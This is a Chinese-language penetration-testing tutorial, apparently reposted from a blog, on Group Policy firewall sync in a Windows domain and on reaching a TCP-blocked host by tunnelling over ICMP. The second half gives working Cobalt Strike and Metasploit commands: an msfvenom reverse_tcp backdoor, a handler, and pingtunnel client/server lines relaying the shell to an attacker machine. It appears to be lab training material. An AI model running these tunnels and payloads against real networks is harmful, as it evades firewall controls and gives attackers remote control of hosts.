【内网安全】组策略同步-不出网隧道上线-TCP转ICMP

news2024/11/24 6:52:47

域控-防火墙-组策略对象同步
- 演示
- - - 1、打开组策略管理，新建一个GPO连接取名fhq(防火墙)
    - 2、编辑fhq并设置防火墙状态
    - 3、命令：gpupdate/force 更新策略
    - 4、域控主机新增规则
    - 5、域内用户主机更新规则
域控-防火墙-组策略不出网上线
- 演示
ICMP协议上线：
- 1、CS-ICMP-上线
- - - 打开cs并新建监听器
    - 生成ICMP1的木马
    - 服务器开启监听
    - 肉鸡：(管理器运行)
- 2、MSF上线
- - - 1、生成后门：
    - 2、MSF启动监听：
    - 3、Kali开启隧道：
    - 4、域内主机运行木马与协议转换器

域控-防火墙-组策略对象同步

熟悉常见主机配置不出网的操作流程
操作：组策略管理-域-创建GPO链接-防火墙设置
更新策略：强制&命令&重启

演示

1、打开组策略管理，新建一个GPO连接取名fhq(防火墙)

2、编辑fhq并设置防火墙状态

这个组策略就是用来同步的，只要域控设置了防火墙就可以同步到域内的其他主机

域网络防火墙配置文件关闭

公用网络防火墙配置文件关闭

专用网络配置文件开启

设置完成后，在fhq的设置里面也可以看到我们设置的防火墙状态

以上是在DC 域控主机上进行的

3、命令：gpupdate/force 更新策略

这里可以配置策略针对的对象，这里我选择针对所有用户

在其他域内主机用户上使用命令 gpupdate /force 更新策略

我们可以看到防火墙设置也同步更新成功了

4、域控主机新增规则

在域控主机上打开组策略管理器

找到出入站规则

这里我新建一个出战规则，针对域，禁用所有tcp端口

全选也可以

取名为 no
建好后就可以看到多了一条出站规则

5、域内用户主机更新规则

进入域用户主机，运行命令 gpupdate /force 更新规则

在域内用户的主机上也同步了规则

域控-防火墙-组策略不出网上线

背景介绍：域控通过组策略设置防火墙规则同步后，域内用户主机被限制TCP出网，其中规则为出站规则，安全研究者通过入站取得SHELL权限，需要对其进行上线控制。
思路：正向连接隧道技术
如果是入站被限制呢？反向连接&隧道技术也可以解决（前提看限制的多不多）

演示

这里以有该主机有网络进行演示（还有种是没有网络的，看下次笔记）
先给主机添加一个网卡，使其能联网

测试一下，可以ping通

虽然可以Ping通，但却访问不了www.baidu.com

（因为ping 命令走的是ICMP协议，而浏览器访问百度是走的TCP协议。但在防火墙中，我们禁用了所有的TCP端口，自然就无法访问了）

既然禁用了TCP协议，那我们就不能用TCP协议进行上线了。这里我们选择将TCP协议封装成ICMP协议进行上线。

ICMP协议上线：

以下提供了三个项目供ICMP协议上线使用。这里我采用第三个进行演示
GitHub - esrrhs/spp: A simple and powerful proxy
GitHub - bdamele/icmpsh: Simple reverse ICMP shell
GitHub - esrrhs/pingtunnel: Pingtunnel is a tool that send TCP/UDP traffic over ICMP

1、CS-ICMP-上线

打开cs并新建监听器

./teamserver 192.168.8.4 123456

新建一个监听器
ICMP1 作为本地的监听器

再添加一个远程的监听器ICMP2作为远程的监听器

监听器1：127.0.0.1 5555
监听器2：192.168.46.66 6666

生成ICMP1的木马

选择这一个

生成监听器1的Stager后门肉鸡执行

服务器开启监听

./pingtunnel -type server

肉鸡：(管理器运行)

pingtunnel.exe -type client -l 127.0.0.1:5555 -s 192.168.8.4 -t 192.168.8.4:6666 -tcp 1 -noprint 1 -nolog 1

然后执行生成的后门
成功上线

2、MSF上线

1、生成后门：

msfvenom -p windows/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=3333 -f exe > msf.exe

将后后门上传到域内主机

2、MSF启动监听：

msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 0.0.0.0
set lport 4444
run

3、Kali开启隧道：

./pingtunnel -type server

Win开启隧道 //将本地3333 icmp协议数据转发至66ip的4444流量上(管理员运行)

4、域内主机运行木马与协议转换器

管理员打开cmd 切换到桌面路径
Pasted%20image%2020240628210610.png|615
运行命令

pingtunnel.exe -type client -l 127.0.0.1:3333 -s 192.168.8.4 -t 192.168.8.4:4444 -tcp 1 -noprint 1 -nolog 1

其中192.168.8.4 是你kali的Ip

运行后可以在kali里面接受到一个ip传来的信息

再运行Msf.exe 成功完成不出网上线

本文来自互联网用户投稿，该文观点仅代表作者本人，不代表本站立场。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如若转载，请注明出处：http://www.coloradmin.cn/o/1874061.html

如若内容造成侵权/违法违规/事实不符，请联系多彩编程网进行投诉反馈，一经查实，立即删除！